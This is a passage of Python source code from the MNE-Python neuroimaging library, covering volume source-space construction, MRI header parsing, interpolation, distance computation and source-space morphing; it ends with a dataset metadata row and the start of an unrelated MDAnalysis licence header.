idx3 = np.logical_and(idx2, x < maxn[0])
neigh[13, idx3] = k[idx3] + 1 - nrow - nplane
# Then the same plane
idx1 = np.logical_and(x < maxn[0], y < maxn[1])
neigh[14, idx1] = k[idx1] + 1 + nrow
idx1 = x > minn[0]
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[15, idx2] = k[idx2] - 1 + nrow
idx2 = np.logical_and(idx1, y > minn[1])
neigh[16, idx2] = k[idx2] - 1 - nrow
idx1 = np.logical_and(y > minn[1], x < maxn[0])
neigh[17, idx1] = k[idx1] + 1 - nrow - nplane
# Finally one plane above
idx1 = z < maxn[2]
idx2 = np.logical_and(idx1, x < maxn[0])
neigh[18, idx2] = k[idx2] + 1 + nplane
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[19, idx3] = k[idx3] + 1 + nrow + nplane
idx2 = np.logical_and(idx1, y < maxn[1])
neigh[20, idx2] = k[idx2] + nrow + nplane
idx2 = np.logical_and(idx1, x > minn[0])
idx3 = np.logical_and(idx2, y < maxn[1])
neigh[21, idx3] = k[idx3] - 1 + nrow + nplane
neigh[22, idx2] = k[idx2] - 1 + nplane
idx3 = np.logical_and(idx2, y > minn[1])
neigh[23, idx3] = k[idx3] - 1 - nrow + nplane
idx2 = np.logical_and(idx1, y > minn[1])
neigh[24, idx2] = k[idx2] - nrow + nplane
idx3 = np.logical_and(idx2, x < maxn[0])
neigh[25, idx3] = k[idx3] + 1 - nrow + nplane
# Restrict sources to volume of interest
if volume_label is not None:
try:
import nibabel as nib
except ImportError:
raise ImportError("nibabel is required to read segmentation file.")
logger.info('Selecting voxels from %s' % volume_label)
# Read the segmentation data using nibabel
mgz = nib.load(mri)
mgz_data = mgz.get_data()
# Get the numeric index for this volume label
lut = _get_lut()
vol_id = _get_lut_id(lut, volume_label, True)
# Get indices for this volume label in voxel space
vox_bool = mgz_data == vol_id
# Get the 3 dimensional indices in voxel space
vox_xyz = np.array(np.where(vox_bool)).T
# Transform to RAS coordinates
# (use tkr normalization or volume won't align with surface sources)
trans = _get_mgz_header(mri)['vox2ras_tkr']
# Convert transform from mm to m
trans[:3] /= 1000.
rr_voi = apply_trans(trans, vox_xyz) # positions of VOI in RAS space
# Filter out points too far from volume region voxels
dists = _compute_nearest(rr_voi, sp['rr'], return_dists=True)[1]
# Maximum distance from center of mass of a voxel to any of its corners
maxdist = np.sqrt(((trans[:3, :3].sum(0) / 2.) ** 2).sum())
bads = np.where(dists > maxdist)[0]
# Update source info
sp['inuse'][bads] = False
sp['vertno'] = np.where(sp['inuse'] > 0)[0]
sp['nuse'] = len(sp['vertno'])
sp['seg_name'] = volume_label
sp['mri_file'] = mri
# Update log
logger.info('%d sources remaining after excluding sources too far '
'from VOI voxels', sp['nuse'])
# Omit unused vertices from the neighborhoods
logger.info('Adjusting the neighborhood info...')
# remove non source-space points
log_inuse = sp['inuse'] > 0
neigh[:, np.logical_not(log_inuse)] = -1
# remove these points from neigh
vertno = np.where(log_inuse)[0]
sp['vertno'] = vertno
old_shape = neigh.shape
neigh = neigh.ravel()
checks = np.where(neigh >= 0)[0]
removes = np.logical_not(in1d(checks, vertno))
neigh[checks[removes]] = -1
neigh.shape = old_shape
neigh = neigh.T
# Thought we would need this, but C code keeps -1 vertices, so we will:
# neigh = [n[n >= 0] for n in enumerate(neigh[vertno])]
sp['neighbor_vert'] = neigh
# Set up the volume data (needed for creating the interpolation matrix)
r0 = minn * grid
voxel_size = grid * np.ones(3)
ras = np.eye(3)
sp['src_mri_t'] = _make_voxel_ras_trans(r0, ras, voxel_size)
sp['vol_dims'] = maxn - minn + 1
return sp
def _vol_vertex(width, height, jj, kk, pp):
return jj + width * kk + pp * (width * height)
def _get_mgz_header(fname):
"""Adapted from nibabel to quickly extract header info"""
if not fname.endswith('.mgz'):
raise IOError('Filename must end with .mgz')
header_dtd = [('version', '>i4'), ('dims', '>i4', (4,)),
('type', '>i4'), ('dof', '>i4'), ('goodRASFlag', '>i2'),
('delta', '>f4', (3,)), ('Mdc', '>f4', (3, 3)),
('Pxyz_c', '>f4', (3,))]
header_dtype = np.dtype(header_dtd)
with gzip_open(fname, 'rb') as fid:
hdr_str = fid.read(header_dtype.itemsize)
header = np.ndarray(shape=(), dtype=header_dtype,
buffer=hdr_str)
# dims
dims = header['dims'].astype(int)
dims = dims[:3] if len(dims) == 4 else dims
# vox2ras_tkr
delta = header['delta']
ds = np.array(delta, float)
ns = np.array(dims * ds) / 2.0
v2rtkr = np.array([[-ds[0], 0, 0, ns[0]],
[0, 0, ds[2], -ns[2]],
[0, -ds[1], 0, ns[1]],
[0, 0, 0, 1]], dtype=np.float32)
# ras2vox
d = np.diag(delta)
pcrs_c = dims / 2.0
Mdc = header['Mdc'].T
pxyz_0 = header['Pxyz_c'] - np.dot(Mdc, np.dot(d, pcrs_c))
M = np.eye(4, 4)
M[0:3, 0:3] = np.dot(Mdc, d)
M[0:3, 3] = pxyz_0.T
M = linalg.inv(M)
header = dict(dims=dims, vox2ras_tkr=v2rtkr, ras2vox=M)
return header
def _add_interpolator(s, mri_name, add_interpolator):
"""Compute a sparse matrix to interpolate the data into an MRI volume"""
# extract transformation information from mri
logger.info('Reading %s...' % mri_name)
header = _get_mgz_header(mri_name)
mri_width, mri_height, mri_depth = header['dims']
s.update(dict(mri_width=mri_width, mri_height=mri_height,
mri_depth=mri_depth))
trans = header['vox2ras_tkr'].copy()
trans[:3, :] /= 1000.0
s['vox_mri_t'] = Transform('mri_voxel', 'mri', trans) # ras_tkr
trans = linalg.inv(np.dot(header['vox2ras_tkr'], header['ras2vox']))
trans[:3, 3] /= 1000.0
s['mri_ras_t'] = Transform('mri', 'ras', trans) # ras
s['mri_volume_name'] = mri_name
nvox = mri_width * mri_height * mri_depth
if not add_interpolator:
s['interpolator'] = sparse.csr_matrix((nvox, s['np']))
return
_print_coord_trans(s['src_mri_t'], 'Source space : ')
_print_coord_trans(s['vox_mri_t'], 'MRI volume : ')
_print_coord_trans(s['mri_ras_t'], 'MRI volume : ')
#
# Convert MRI voxels from destination (MRI volume) to source (volume
# source space subset) coordinates
#
combo_trans = combine_transforms(s['vox_mri_t'],
invert_transform(s['src_mri_t']),
'mri_voxel', 'mri_voxel')
combo_trans['trans'] = combo_trans['trans'].astype(np.float32)
logger.info('Setting up interpolation...')
# Loop over slices to save (lots of) memory
# Note that it is the slowest incrementing index
# This is equivalent to using mgrid and reshaping, but faster
data = []
indices = []
indptr = np.zeros(nvox + 1, np.int32)
for p in range(mri_depth):
js = np.arange(mri_width, dtype=np.float32)
js = np.tile(js[np.newaxis, :],
(mri_height, 1)).ravel()
ks = np.arange(mri_height, dtype=np.float32)
ks = np.tile(ks[:, np.newaxis],
(1, mri_width)).ravel()
ps = np.empty((mri_height, mri_width), np.float32).ravel()
ps.fill(p)
r0 = np.c_[js, ks, ps]
del js, ks, ps
# Transform our vertices from their MRI space into our source space's
# frame (this is labeled as FIFFV_MNE_COORD_MRI_VOXEL, but it's
# really a subset of the entire volume!)
r0 = apply_trans(combo_trans['trans'], r0)
rn = np.floor(r0).astype(int)
maxs = (s['vol_dims'] - 1)[np.newaxis, :]
good = np.where(np.logical_and(np.all(rn >= 0, axis=1),
np.all(rn < maxs, axis=1)))[0]
rn = rn[good]
r0 = r0[good]
# now we take each MRI voxel *in this space*, and figure out how
# to make its value the weighted sum of voxels in the volume source
# space. This is a 3D weighting scheme based (presumably) on the
# fact that we know we're interpolating from one volumetric grid
# into another.
jj = rn[:, 0]
kk = rn[:, 1]
pp = rn[:, 2]
vss = np.empty((len(jj), 8), np.int32)
width = s['vol_dims'][0]
height = s['vol_dims'][1]
jjp1 = jj + 1
kkp1 = kk + 1
ppp1 = pp + 1
vss[:, 0] = _vol_vertex(width, height, jj, kk, pp)
vss[:, 1] = _vol_vertex(width, height, jjp1, kk, pp)
vss[:, 2] = _vol_vertex(width, height, jjp1, kkp1, pp)
vss[:, 3] = _vol_vertex(width, height, jj, kkp1, pp)
vss[:, 4] = _vol_vertex(width, height, jj, kk, ppp1)
vss[:, 5] = _vol_vertex(width, height, jjp1, kk, ppp1)
vss[:, 6] = _vol_vertex(width, height, jjp1, kkp1, ppp1)
vss[:, 7] = _vol_vertex(width, height, jj, kkp1, ppp1)
del jj, kk, pp, jjp1, kkp1, ppp1
uses = np.any(s['inuse'][vss], axis=1)
if uses.size == 0:
continue
vss = vss[uses].ravel() # vertex (col) numbers in csr matrix
indices.append(vss)
indptr[good[uses] + p * mri_height * mri_width + 1] = 8
del vss
# figure out weights for each vertex
r0 = r0[uses]
rn = rn[uses]
del uses, good
xf = r0[:, 0] - rn[:, 0].astype(np.float32)
yf = r0[:, 1] - rn[:, 1].astype(np.float32)
zf = r0[:, 2] - rn[:, 2].astype(np.float32)
omxf = 1.0 - xf
omyf = 1.0 - yf
omzf = 1.0 - zf
# each entry in the concatenation corresponds to a row of vss
data.append(np.array([omxf * omyf * omzf,
xf * omyf * omzf,
xf * yf * omzf,
omxf * yf * omzf,
omxf * omyf * zf,
xf * omyf * zf,
xf * yf * zf,
omxf * yf * zf], order='F').T.ravel())
del xf, yf, zf, omxf, omyf, omzf
# Compose the sparse matrix
indptr = np.cumsum(indptr, out=indptr)
indices = np.concatenate(indices)
data = np.concatenate(data)
s['interpolator'] = sparse.csr_matrix((data, indices, indptr),
shape=(nvox, s['np']))
logger.info(' %d/%d nonzero values [done]' % (len(data), nvox))
@verbose
def _filter_source_spaces(surf, limit, mri_head_t, src, n_jobs=1,
verbose=None):
"""Remove all source space points closer than a given limit (in mm)"""
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD and mri_head_t is None:
raise RuntimeError('Source spaces are in head coordinates and no '
'coordinate transform was provided!')
# How close are the source points to the surface?
out_str = 'Source spaces are in '
if src[0]['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
inv_trans = invert_transform(mri_head_t)
out_str += 'head coordinates.'
elif src[0]['coord_frame'] == FIFF.FIFFV_COORD_MRI:
out_str += 'MRI coordinates.'
else:
out_str += 'unknown (%d) coordinates.' % src[0]['coord_frame']
logger.info(out_str)
out_str = 'Checking that the sources are inside the bounding surface'
if limit > 0.0:
out_str += ' and at least %6.1f mm away' % (limit)
logger.info(out_str + ' (will take a few...)')
for s in src:
vertno = np.where(s['inuse'])[0] # can't trust s['vertno'] this deep
# Convert all points here first to save time
r1s = s['rr'][vertno]
if s['coord_frame'] == FIFF.FIFFV_COORD_HEAD:
r1s = apply_trans(inv_trans['trans'], r1s)
# Check that the source is inside surface (often the inner skull)
outside = _points_outside_surface(r1s, surf, n_jobs)
omit_outside = np.sum(outside)
# vectorized nearest using BallTree (or cdist)
omit = 0
if limit > 0.0:
dists = _compute_nearest(surf['rr'], r1s, return_dists=True)[1]
close = np.logical_and(dists < limit / 1000.0,
np.logical_not(outside))
omit = np.sum(close)
outside = np.logical_or(outside, close)
s['inuse'][vertno[outside]] = False
s['nuse'] -= (omit + omit_outside)
s['vertno'] = np.where(s['inuse'])[0]
if omit_outside > 0:
extras = [omit_outside]
extras += ['s', 'they are'] if omit_outside > 1 else ['', 'it is']
logger.info('%d source space point%s omitted because %s '
'outside the inner skull surface.' % tuple(extras))
if omit > 0:
extras = [omit]
extras += ['s'] if omit_outside > 1 else ['']
extras += [limit]
logger.info('%d source space point%s omitted because of the '
'%6.1f-mm distance limit.' % tuple(extras))
logger.info('Thank you for waiting.')
@verbose
def _points_outside_surface(rr, surf, n_jobs=1, verbose=None):
"""Check whether points are outside a surface
Parameters
----------
rr : ndarray
Nx3 array of points to check.
surf : dict
Surface with entries "rr" and "tris".
Returns
-------
outside : ndarray
1D logical array of size N for which points are outside the surface.
"""
rr = np.atleast_2d(rr)
assert rr.shape[1] == 3
parallel, p_fun, _ = parallel_func(_get_solids, n_jobs)
tot_angles = parallel(p_fun(surf['rr'][tris], rr)
for tris in np.array_split(surf['tris'], n_jobs))
return np.abs(np.sum(tot_angles, axis=0) / (2 * np.pi) - 1.0) > 1e-5
def _get_solids(tri_rrs, fros):
"""Helper for computing _sum_solids_div total angle in chunks"""
# NOTE: This incorporates the division by 4PI that used to be separate
# for tri_rr in tri_rrs:
# v1 = fros - tri_rr[0]
# v2 = fros - tri_rr[1]
# v3 = fros - tri_rr[2]
# triple = np.sum(fast_cross_3d(v1, v2) * v3, axis=1)
# l1 = np.sqrt(np.sum(v1 * v1, axis=1))
# l2 = np.sqrt(np.sum(v2 * v2, axis=1))
# l3 = np.sqrt(np.sum(v3 * v3, axis=1))
# s = (l1 * l2 * l3 +
# np.sum(v1 * v2, axis=1) * l3 +
# np.sum(v1 * v3, axis=1) * l2 +
# np.sum(v2 * v3, axis=1) * l1)
# tot_angle -= np.arctan2(triple, s)
# This is the vectorized version, but with a slicing heuristic to
# prevent memory explosion
tot_angle = np.zeros((len(fros)))
slices = np.r_[np.arange(0, len(fros), 100), [len(fros)]]
for i1, i2 in zip(slices[:-1], slices[1:]):
v1 = fros[i1:i2] - tri_rrs[:, 0, :][:, np.newaxis]
v2 = fros[i1:i2] - tri_rrs[:, 1, :][:, np.newaxis]
v3 = fros[i1:i2] - tri_rrs[:, 2, :][:, np.newaxis]
triples = _fast_cross_nd_sum(v1, v2, v3)
l1 = np.sqrt(np.sum(v1 * v1, axis=2))
l2 = np.sqrt(np.sum(v2 * v2, axis=2))
l3 = np.sqrt(np.sum(v3 * v3, axis=2))
ss = (l1 * l2 * l3 +
np.sum(v1 * v2, axis=2) * l3 +
np.sum(v1 * v3, axis=2) * l2 +
np.sum(v2 * v3, axis=2) * l1)
tot_angle[i1:i2] = -np.sum(np.arctan2(triples, ss), axis=0)
return tot_angle
@verbose
def _ensure_src(src, verbose=None):
"""Helper to ensure we have a source space"""
if isinstance(src, string_types):
if not op.isfile(src):
raise IOError('Source space file "%s" not found' % src)
logger.info('Reading %s...' % src)
src = read_source_spaces(src, verbose=False)
if not isinstance(src, SourceSpaces):
raise ValueError('src must be a string or instance of SourceSpaces')
return src
def _ensure_src_subject(src, subject):
src_subject = src[0].get('subject_his_id', None)
if subject is None:
subject = src_subject
if subject is None:
raise ValueError('source space is too old, subject must be '
'provided')
elif src_subject is not None and subject != src_subject:
raise ValueError('Mismatch between provided subject "%s" and subject '
'name "%s" in the source space'
% (subject, src_subject))
return subject
@verbose
def add_source_space_distances(src, dist_limit=np.inf, n_jobs=1, verbose=None):
"""Compute inter-source distances along the cortical surface
This function will also try to add patch info for the source space.
It will only occur if the ``dist_limit`` is sufficiently high that all
points on the surface are within ``dist_limit`` of a point in the
source space.
Parameters
----------
src : instance of SourceSpaces
The source spaces to compute distances for.
dist_limit : float
The upper limit of distances to include (in meters).
Note: if limit < np.inf, scipy > 0.13 (bleeding edge as of
10/2013) must be installed.
n_jobs : int
Number of jobs to run in parallel. Will only use (up to) as many
cores as there are source spaces.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : instance of SourceSpaces
The original source spaces, with distance information added.
The distances are stored in src[n]['dist'].
Note: this function operates in-place.
Notes
-----
Requires scipy >= 0.11 (> 0.13 for `dist_limit < np.inf`).
This function can be memory- and CPU-intensive. On a high-end machine
(2012) running 6 jobs in parallel, an ico-5 (10242 per hemi) source space
takes about 10 minutes to compute all distances (`dist_limit = np.inf`).
With `dist_limit = 0.007`, computing distances takes about 1 minute.
We recommend computing distances once per source space and then saving
the source space to disk, as the computed distances will automatically be
stored along with the source space data for future use.
"""
n_jobs = check_n_jobs(n_jobs)
src = _ensure_src(src)
if not np.isscalar(dist_limit):
raise ValueError('limit must be a scalar, got %s' % repr(dist_limit))
if not check_version('scipy', '0.11'):
raise RuntimeError('scipy >= 0.11 must be installed (or > 0.13 '
'if dist_limit < np.inf')
if not all(s['type'] == 'surf' for s in src):
raise RuntimeError('Currently all source spaces must be of surface '
'type')
if dist_limit < np.inf:
# can't do introspection on dijkstra function because it's Cython,
# so we'll just try quickly here
try:
sparse.csgraph.dijkstra(sparse.csr_matrix(np.zeros((2, 2))),
limit=1.0)
except TypeError:
raise RuntimeError('Cannot use "limit < np.inf" unless scipy '
'> 0.13 is installed')
parallel, p_fun, _ = parallel_func(_do_src_distances, n_jobs)
min_dists = list()
min_idxs = list()
logger.info('Calculating source space distances (limit=%s mm)...'
% (1000 * dist_limit))
for s in src:
connectivity = mesh_dist(s['tris'], s['rr'])
d = parallel(p_fun(connectivity, s['vertno'], r, dist_limit)
for r in np.array_split(np.arange(len(s['vertno'])),
n_jobs))
# deal with indexing so we can add patch info
min_idx = np.array([dd[1] for dd in d])
min_dist = np.array([dd[2] for dd in d])
midx = np.argmin(min_dist, axis=0)
range_idx = np.arange(len(s['rr']))
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
min_dists.append(min_dist)
min_idxs.append(min_idx)
# now actually deal with distances, convert to sparse representation
d = np.concatenate([dd[0] for dd in d]).ravel() # already float32
idx = d > 0
d = d[idx]
i, j = np.meshgrid(s['vertno'], s['vertno'])
i = i.ravel()[idx]
j = j.ravel()[idx]
d = sparse.csr_matrix((d, (i, j)),
shape=(s['np'], s['np']), dtype=np.float32)
s['dist'] = d
s['dist_limit'] = np.array([dist_limit], np.float32)
# Let's see if our distance was sufficient to allow for patch info
if not any(np.any(np.isinf(md)) for md in min_dists):
# Patch info can be added!
for s, min_dist, min_idx in zip(src, min_dists, min_idxs):
s['nearest'] = min_idx
s['nearest_dist'] = min_dist
_add_patch_info(s)
else:
logger.info('Not adding patch information, dist_limit too small')
return src
def _do_src_distances(con, vertno, run_inds, limit):
"""Helper to compute source space distances in chunks"""
if limit < np.inf:
func = partial(sparse.csgraph.dijkstra, limit=limit)
else:
func = sparse.csgraph.dijkstra
chunk_size = 20 # save memory by chunking (only a little slower)
lims = np.r_[np.arange(0, len(run_inds), chunk_size), len(run_inds)]
n_chunks = len(lims) - 1
# eventually we want this in float32, so save memory by only storing 32-bit
d = np.empty((len(run_inds), len(vertno)), np.float32)
min_dist = np.empty((n_chunks, con.shape[0]))
min_idx = np.empty((n_chunks, con.shape[0]), np.int32)
range_idx = np.arange(con.shape[0])
for li, (l1, l2) in enumerate(zip(lims[:-1], lims[1:])):
idx = vertno[run_inds[l1:l2]]
out = func(con, indices=idx)
midx = np.argmin(out, axis=0)
min_idx[li] = idx[midx]
min_dist[li] = out[midx, range_idx]
d[l1:l2] = out[:, vertno]
midx = np.argmin(min_dist, axis=0)
min_dist = min_dist[midx, range_idx]
min_idx = min_idx[midx, range_idx]
d[d == np.inf] = 0 # scipy will give us np.inf for uncalc. distances
return d, min_idx, min_dist
def get_volume_labels_from_aseg(mgz_fname):
"""Returns a list of names of segmented volumes.
Parameters
----------
mgz_fname : str
Filename to read. Typically aseg.mgz or some variant in the freesurfer
pipeline.
Returns
-------
label_names : list of str
The names of segmented volumes included in this mgz file.
Notes
-----
.. versionadded:: 0.9.0
"""
import nibabel as nib
# Read the mgz file using nibabel
mgz_data = nib.load(mgz_fname).get_data()
# Get the unique label names
lut = _get_lut()
label_names = [lut[lut['id'] == ii]['name'][0].decode('utf-8')
for ii in np.unique(mgz_data)]
label_names = sorted(label_names, key=lambda n: n.lower())
return label_names
def _get_hemi(s):
"""Helper to get a hemisphere from a given source space"""
if s['type'] != 'surf':
raise RuntimeError('Only surface source spaces supported')
if s['id'] == FIFF.FIFFV_MNE_SURF_LEFT_HEMI:
return 'lh', 0, s['id']
elif s['id'] == FIFF.FIFFV_MNE_SURF_RIGHT_HEMI:
return 'rh', 1, s['id']
else:
raise ValueError('unknown surface ID %s' % s['id'])
def _get_vertex_map_nn(fro_src, subject_from, subject_to, hemi, subjects_dir,
to_neighbor_tri=None):
"""Helper to get a nearest-neigbor vertex match for a given hemi src
The to_neighbor_tri can optionally be passed in to avoid recomputation
if it's already available.
"""
# adapted from mne_make_source_space.c, knowing accurate=False (i.e.
# nearest-neighbor mode should be used)
logger.info('Mapping %s %s -> %s (nearest neighbor)...'
% (hemi, subject_from, subject_to))
regs = [op.join(subjects_dir, s, 'surf', '%s.sphere.reg' % hemi)
for s in (subject_from, subject_to)]
reg_fro, reg_to = [_read_surface_geom(r, patch_stats=False) for r in regs]
if to_neighbor_tri is None:
to_neighbor_tri = _triangle_neighbors(reg_to['tris'], reg_to['np'])
morph_inuse = np.zeros(len(reg_to['rr']), bool)
best = np.zeros(fro_src['np'], int)
ones = _compute_nearest(reg_to['rr'], reg_fro['rr'][fro_src['vertno']])
for v, one in zip(fro_src['vertno'], ones):
# if it were actually a proper morph map, we would do this, but since
# we know it's nearest neighbor list, we don't need to:
# this_mm = mm[v]
# one = this_mm.indices[this_mm.data.argmax()]
if morph_inuse[one]:
# Try the nearest neighbors
neigh = _get_surf_neighbors(reg_to, one) # on demand calc
was = one
one = neigh[np.where(~morph_inuse[neigh])[0]]
if len(one) == 0:
raise RuntimeError('vertex %d would be used multiple times.'
% one)
one = one[0]
logger.info('Source space vertex moved from %d to %d because of '
'double occupation.' % (was, one))
best[v] = one
morph_inuse[one] = True
return best
@verbose
def morph_source_spaces(src_from, subject_to, surf='white', subject_from=None,
subjects_dir=None, verbose=None):
"""Morph an existing source space to a different subject
.. warning:: This can be used in place of morphing source estimates for
multiple subjects, but there may be consequences in terms
of dipole topology.
Parameters
----------
src_from : instance of SourceSpaces
Surface source spaces to morph.
subject_to : str
The destination subject.
surf : str
The brain surface to use for the new source space.
subject_from : str | None
The "from" subject. For most source spaces this shouldn't need
to be provided, since it is stored in the source space itself.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
src : instance of SourceSpaces
The morphed source spaces.
Notes
-----
.. versionadded:: 0.10.0
"""
# adapted from mne_make_source_space.c
src_from = _ensure_src(src_from)
subject_from = _ensure_src_subject(src_from, subject_from)
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
src_out = list()
for fro in src_from:
hemi, idx, id_ = _get_hemi(fro)
to = op.join(subjects_dir, subject_to, 'surf', '%s.%s' % (hemi, surf,))
logger.info('Reading destination surface %s' % (to,))
to = _read_surface_geom(to, patch_stats=False, verbose=False)
_complete_surface_info(to)
# Now we morph the vertices to the destination
# The C code does something like this, but with a nearest-neighbor
# mapping instead of the weighted one::
#
# >>> mm = read_morph_map(subject_from, subject_to, subjects_dir)
#
# Here we use a direct NN calculation, since picking the max from the
# existing morph map (which naively one might expect to be equivalent)
# differs for ~3% of vertices.
best = _get_vertex_map_nn(fro, subject_from, subject_to, hemi,
subjects_dir, to['neighbor_tri'])
for key in ('neighbor_tri', 'tri_area', 'tri_cent', 'tri_nn',
'use_tris'):
del to[key]
to['vertno'] = np.sort(best[fro['vertno']])
to['inuse'] = np.zeros(len(to['rr']), int)
to['inuse'][to['vertno']] = True
to['use_tris'] = best[fro['use_tris']]
to.update(nuse=len(to['vertno']), nuse_tri=len(to['use_tris']),
nearest=None, nearest_dist=None, patch_inds=None, pinfo=None,
dist=None, id=id_, dist_limit=None, type='surf',
coord_frame=FIFF.FIFFV_COORD_MRI, subject_his_id=subject_to,
rr=to['rr'] / 1000.)
src_out.append(to)
logger.info('[done]\n')
info = dict(working_dir=os.getcwd(),
command_line=_get_call_line(in_verbose=True))
return SourceSpaces(src_out, info=info)
@verbose
def _get_morph_src_reordering(vertices, src_from, subject_from, subject_to,
subjects_dir=None, verbose=None):
"""Get the reordering indices for a morphed source space
Parameters
----------
vertices : list
The vertices for the left and right hemispheres.
src_from : instance of SourceSpaces
The original source space.
subject_from : str
The source subject.
subject_to : str
The destination subject.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
data_idx : ndarray, shape (n_vertices,)
The array used to reshape the data.
from_vertices : list
The right and left hemisphere vertex numbers for the "from" subject.
"""
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
from_vertices = list()
data_idxs = list()
offset = 0
for ii, hemi in enumerate(('lh', 'rh')):
# Get the mapping from the original source space to the destination
# subject's surface vertex numbers
best = _get_vertex_map_nn(src_from[ii], subject_from, subject_to,
hemi, subjects_dir)
full_mapping = best[src_from[ii]['vertno']]
# Tragically, we might not have all of our vertno left (e.g. because
# some are omitted during fwd calc), so we must do some indexing magic:
# From all vertices, a subset could be chosen by fwd calc:
used_vertices = in1d(full_mapping, vertices[ii])
from_vertices.append(src_from[ii]['vertno'][used_vertices])
remaining_mapping = full_mapping[used_vertices]
if not np.array_equal(np.sort(remaining_mapping), vertices[ii]) or \
not in1d(vertices[ii], full_mapping).all():
raise RuntimeError('Could not map vertices, perhaps the wrong '
'subject "%s" was provided?' % subject_from)
# And our data have been implicitly remapped by the forced ascending
# vertno order in source spaces
implicit_mapping = np.argsort(remaining_mapping) # happens to data
data_idx = np.argsort(implicit_mapping) # to reverse the mapping
data_idx += offset # hemisphere offset
data_idxs.append(data_idx)
offset += len(implicit_mapping)
data_idx = np.concatenate(data_idxs)
# this one is really just a sanity check for us, should never be violated
# by users
assert np.array_equal(np.sort(data_idx),
np.arange(sum(len(v) for v in vertices)))
return data_idx, from_vertices
def _compare_source_spaces(src0, src1, mode='exact', dist_tol=1.5e-3):
"""Compare two source spaces
Note: this function is also used by forward/tests/test_make_forward.py
"""
from nose.tools import assert_equal, assert_true
from numpy.testing import assert_allclose, assert_array_equal
from scipy.spatial.distance import cdist
if mode != 'exact' and 'approx' not in mode: # 'nointerp' can be appended
raise RuntimeError('unknown mode %s' % mode)
for s0, s1 in zip(src0, src1):
# first check the keys
a, b = set(s0.keys()), set(s1.keys())
assert_equal(a, b, str(a ^ b))
for name in ['nuse', 'ntri', 'np', 'type', 'id']:
assert_equal(s0[name], s1[name], name)
for name in ['subject_his_id']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
for name in ['interpolator']:
if name in s0 or name in s1:
diffs = (s0['interpolator'] - s1['interpolator']).data
if len(diffs) > 0 and 'nointerp' not in mode:
# 5%
assert_true(np.sqrt(np.mean(diffs ** 2)) < 0.10, name)
for name in ['nn', 'rr', 'nuse_tri', 'coord_frame', 'tris']:
if s0[name] is None:
assert_true(s1[name] is None, name)
else:
if mode == 'exact':
assert_array_equal(s0[name], s1[name], name)
else: # 'approx' in mode
atol = 1e-3 if name == 'nn' else 1e-4
assert_allclose(s0[name], s1[name], rtol=1e-3, atol=atol,
err_msg=name)
for name in ['seg_name']:
if name in s0 or name in s1:
assert_equal(s0[name], s1[name], name)
if mode == 'exact':
for name in ['inuse', 'vertno', 'use_tris']:
assert_array_equal(s0[name], s1[name], err_msg=name)
# these fields will exist if patch info was added, these are
# not tested in mode == 'approx'
for name in ['nearest', 'nearest_dist']:
if s0[name] is None:
assert_true(s1[name] is None, name)
else:
assert_array_equal(s0[name], s1[name])
for name in ['dist_limit']:
assert_true(s0[name] == s1[name], name)
for name in ['dist']:
if s0[name] is not None:
assert_equal(s1[name].shape, s0[name].shape)
assert_true(len((s0['dist'] - s1['dist']).data) == 0)
for name in ['pinfo']:
if s0[name] is not None:
assert_true(len(s0[name]) == len(s1[name]))
for p1, p2 in zip(s0[name], s1[name]):
assert_true(all(p1 == p2))
else: # 'approx' in mode:
# deal with vertno, inuse, and use_tris carefully
assert_array_equal(s0['vertno'], np.where(s0['inuse'])[0],
'left hemisphere vertices')
assert_array_equal(s1['vertno'], np.where(s1['inuse'])[0],
'right hemisphere vertices')
assert_equal(len(s0['vertno']), len(s1['vertno']))
agreement = np.mean(s0['inuse'] == s1['inuse'])
assert_true(agreement >= 0.99, "%s < 0.99" % agreement)
if agreement < 1.0:
# make sure mismatched vertno are within 1.5mm
v0 = np.setdiff1d(s0['vertno'], s1['vertno'])
v1 = np.setdiff1d(s1['vertno'], s0['vertno'])
dists = cdist(s0['rr'][v0], s1['rr'][v1])
assert_allclose(np.min(dists, axis=1), np.zeros(len(v0)),
atol=dist_tol, err_msg='mismatched vertno')
if s0['use_tris'] is not None: # for "spacing"
assert_array_equal(s0['use_tris'].shape, s1['use_tris'].shape)
else:
assert_true(s1['use_tris'] is None)
assert_true(np.mean(s0['use_tris'] == s1['use_tris']) > 0.99)
# The above "if s0[name] is not None" can be removed once the sample
# dataset is updated to have a source space with distance info
for name in ['working_dir', 'command_line']:
if mode == 'exact':
assert_equal(src0.info[name], src1.info[name])
else: # 'approx' in mode:
if name in src0.info:
assert_true(name in src1.info, '"%s" missing' % name)
else:
assert_true(name not in src1.info,
'"%s" should not exist' % name)
| rajegannathan/grasp-lift-eeg-cat-dog-solution-updated | python-packages/mne-python-0.10/mne/source_space.py | Python | bsd-3-clause | 101,801 | [
"Mayavi"
] | adf97e9266371011a3b81f597a3fc6ae7df64cde7630ebd729a25cd8586ca995 |
# -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
# doi: 10.25080/majora-629e541a-00e
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
